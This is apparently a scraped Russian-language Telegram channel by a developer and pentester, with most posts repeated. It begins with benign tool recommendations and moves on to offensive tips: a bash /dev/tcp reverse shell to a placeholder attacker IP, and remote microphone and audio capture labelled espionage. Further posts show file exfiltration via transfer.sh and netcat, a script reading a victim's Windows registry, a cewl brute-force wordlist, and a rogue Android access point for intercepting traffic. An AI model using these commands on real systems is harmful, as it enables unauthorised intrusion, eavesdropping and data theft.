0x01 Intro:
Кто я?
Я разработчик/пентестер/девопс парень.
В индустрии я примерно с 2008 года. За это время накопился определенный опыт и багаж знаний.
Зачем этот канал?
В какой-то момент была идея начать делится своими мыслями и опытом. Сначала я делал это в одной уютной группе. Однако в группах делиться инфой не всегда удобно в связи с тем, что там бывают ещё дежурные разговоры.
О чём этот канал?
Этот канал будет о лайфхаках, фишках, хитростях, best practices, которые автор и его друзья используют день ото дня.
Милости просим :)
Кто я?
Я разработчик/пентестер/девопс парень.
В индустрии я примерно с 2008 года. За это время накопился определенный опыт и багаж знаний.
Зачем этот канал?
В какой-то момент была идея начать делится своими мыслями и опытом. Сначала я делал это в одной уютной группе. Однако в группах делиться инфой не всегда удобно в связи с тем, что там бывают ещё дежурные разговоры.
О чём этот канал?
Этот канал будет о лайфхаках, фишках, хитростях, best practices, которые автор и его друзья используют день ото дня.
Милости просим :)
Если вам интересна тема производительности Linux, а также профилирования производительности, то есть замечательный сайт по сабжу:
http://www.brendangregg.com/linuxperf.html
#perks #linux #performance
http://www.brendangregg.com/linuxperf.html
#perks #linux #performance
Судьба сделала так, что я всю свою карьеру в основном работал с PG и Oracle DB.
О постгресе можно писать много, но сейчас хочу отметить хороший сайт, который описывает внутреннюю архитектуру данной базы
http://www.interdb.jp/pg/index.html
#perks #postgres #architecture
О постгресе можно писать много, но сейчас хочу отметить хороший сайт, который описывает внутреннюю архитектуру данной базы
http://www.interdb.jp/pg/index.html
#perks #postgres #architecture
Наверное бывает, что есть проблема и её надо решить, но часто не хватает опыта. Однако есть кто-то опытный. Как дать ему доступ удалённо по ssh, да так, чтобы не скомпрометировать свою систему?
Есть два решения для этого, которые я знаю:
1) https://tmate.io
2) https://www.teleconsole.com/
Эти сервисы позволяют шейрить терминал на общак.
Для разрабов будет большой плюс в том, что в teleconsole есть авторизация по github public key.
Оба сервиса можно хостить у себя for security reasons, если вы не доверяете сторонним серверам.
tl;dr Терминальный TeamViewer
#perks #remote #ssh #teamviewer
Есть два решения для этого, которые я знаю:
1) https://tmate.io
2) https://www.teleconsole.com/
Эти сервисы позволяют шейрить терминал на общак.
Для разрабов будет большой плюс в том, что в teleconsole есть авторизация по github public key.
Оба сервиса можно хостить у себя for security reasons, если вы не доверяете сторонним серверам.
tl;dr Терминальный TeamViewer
#perks #remote #ssh #teamviewer
Иногда бывает так, что нужно записать сеанс терминала для дальнейшей демонстрации.
Возможно кто-то сделает скринкаст и выложит видео на youtube. И это будет не самым оптимальным вариантом.
Ведь есть https://asciinema.org, который позволяет записывать терминальные сессии буквально в килобайты с дальнейшей возможностью выложить это на сам сайт, либо уютно хранить у себя в ~/manuals в качестве замены мануалов.
#perks #ssh #record
Возможно кто-то сделает скринкаст и выложит видео на youtube. И это будет не самым оптимальным вариантом.
Ведь есть https://asciinema.org, который позволяет записывать терминальные сессии буквально в килобайты с дальнейшей возможностью выложить это на сам сайт, либо уютно хранить у себя в ~/manuals в качестве замены мануалов.
#perks #ssh #record
Что делать, если вы за NAT или ещё чего, а порт нужно выставить наружу, при этом
Есть несколько решений для этого:
1) https://ngrok.com/
2) https://localtunnel.github.io/www/
Юзал оба, выручали не раз.
#perks #remote #portforwarding
-R
на SSH некуда сделать?Есть несколько решений для этого:
1) https://ngrok.com/
2) https://localtunnel.github.io/www/
Юзал оба, выручали не раз.
#perks #remote #portforwarding
Ngrok
ngrok | API Gateway, Kubernetes Ingress, Webhook Gateway
ngrok simplifies app delivery by unifying API gateway, Kubernetes ingress, multi-cluster load balancing and more with ngrok's Universal Gateway.
Если кому-то нужно ограничить коннект для приложения под Linux, то есть замечательная программа http://douaneapp.com/. Она позволяет разрешать/запрещать доступ в сеть отдельным процессам.
#perks #firewall #gtk
#perks #firewall #gtk
Пост для админов и тех кто держит свой небольшой проект/прод:
Есть такой веб-сервер https://caddyserver.com/
* По дефолту есть авто-SSL (via Letsencrypt), который сам ставится и продлевается. Главное иметь свой домен.
* Отдаёт автоматом markdown в виде html. (Ура, можно выкинуть jekyll)
* Веб-сервер — это всего лишь 1(!) бинарник без зависимостей (welcome to Golang)
* Вебсокеты из коробки
* IPv6 (всё работает, проверено)
* fastcgi через сокеты (поддержка uwcgi, php, unicorn, etc)
* + Reverse proxy, custom headers, rewrites & 301, vhosts и так далее.
#perks #web #alternginx #caddy
Есть такой веб-сервер https://caddyserver.com/
* По дефолту есть авто-SSL (via Letsencrypt), который сам ставится и продлевается. Главное иметь свой домен.
* Отдаёт автоматом markdown в виде html. (Ура, можно выкинуть jekyll)
* Веб-сервер — это всего лишь 1(!) бинарник без зависимостей (welcome to Golang)
* Вебсокеты из коробки
* IPv6 (всё работает, проверено)
* fastcgi через сокеты (поддержка uwcgi, php, unicorn, etc)
* + Reverse proxy, custom headers, rewrites & 301, vhosts и так далее.
#perks #web #alternginx #caddy
Часто так бывает, что нужно быстро расшарить (угнать) файл через cli.
Для таких случаев есть сервис https://transfer.sh/
Главное, чтобы у вас был curl в системе или любой другой клиент с возможностью отослать post запрос
Пишете в терминале:
и ваш файл будет доступен для скачивания извне. Это очень удобный сервис, более того его можно захостить у себя (как я сделал для себя)
#perks #curl #upload #exfiltration
Для таких случаев есть сервис https://transfer.sh/
Главное, чтобы у вас был curl в системе или любой другой клиент с возможностью отослать post запрос
Пишете в терминале:
curl --upload-file <LOCAL_FILE> https://transfer.sh/<ANY_NAME>
и ваш файл будет доступен для скачивания извне. Это очень удобный сервис, более того его можно захостить у себя (как я сделал для себя)
#perks #curl #upload #exfiltration
⭐️ Данный метод должен знать каждый уважающий себя безопасник.
Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:
(c) @offsec
#backconnect #pentest #hacks
Когда на серваке нет nc и залить ничего нельзя, а очень нужен бэкконнект, то на помощь приходит подсистема /dev:
bash -i >& /dev/tcp/<hacker-ip>/<port> 0>&1
(c) @offsec
#backconnect #pentest #hacks
Раз дело зашло о /dev, то вот вам порция шпионажа. Отправить звук с удалённого компа на свои колонки
Тоже самое можно сделать и с микрофоном.
#hacks #espionage #linux
dd of=/dev/dsp | ssh -c arcfour -C username@host dd if=/dev/dsp
Тоже самое можно сделать и с микрофоном.
#hacks #espionage #linux
Если есть необходимость отдать файл по порту:
либо поднять мобильный веб-сервак:
#hacks #web #exfiltration
nc -v -l -p <PORT> < file
либо поднять мобильный веб-сервак:
python -m SimpleHTTPServer <PORT>
#hacks #web #exfiltration
Когда из-под Linux нужно вытащить инфу из реестра с машины на Windows, например хостнейм:
#!/bin/bash
host="$1"
login_pass=\\Administrator%\<password>
rpc_cmd="net rpc registry enumerate"
reg_cname="HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName"
reg_autorun="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
cname=$rpc_cmd $reg_cname -I $host -U $login_pass | grep -A 2 ComputerName | tail -1 | sed -r 's/^[^"]+//' | sed -r 's/\"//g'
echo HOSTNAME = "$cname"
От себя добавлю, что таким способом можно прописать свой прокси сервер на машине-жертве, тем самым слушать трафик.
(c) @offsec
#bash #registry #hacks
#!/bin/bash
host="$1"
login_pass=\\Administrator%\<password>
rpc_cmd="net rpc registry enumerate"
reg_cname="HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName"
reg_autorun="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
cname=$rpc_cmd $reg_cname -I $host -U $login_pass | grep -A 2 ComputerName | tail -1 | sed -r 's/^[^"]+//' | sed -r 's/\"//g'
echo HOSTNAME = "$cname"
От себя добавлю, что таким способом можно прописать свой прокси сервер на машине-жертве, тем самым слушать трафик.
(c) @offsec
#bash #registry #hacks
Когда нужно создать словарь для брутфорса на основе какого-либо сайта:
(c) @offsec
#dictionary #bruteforce #hacks
cewl -m 4 -w ./dict.txt http://victim.com
(c) @offsec
#dictionary #bruteforce #hacks
Когда нужно быстро развернуть фейковую точку доступа, но на руках только андроид телефон (даже чужой):
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks
1. Идём в настройки Android
2. Создаём свою точку доступа
3. Идём в настройки APN и прописываем прокси сервер (IP, port)
4. На своём VPS разворачиваем прокси-сервер, например Bettercap
5. Профит! Имея любой андроид телефон можно за минуту развернуть свою точку доступа, где открытый трафик будет бегать через твой сервер
(C) @offsec
#mitm #proxy #pentest #hacks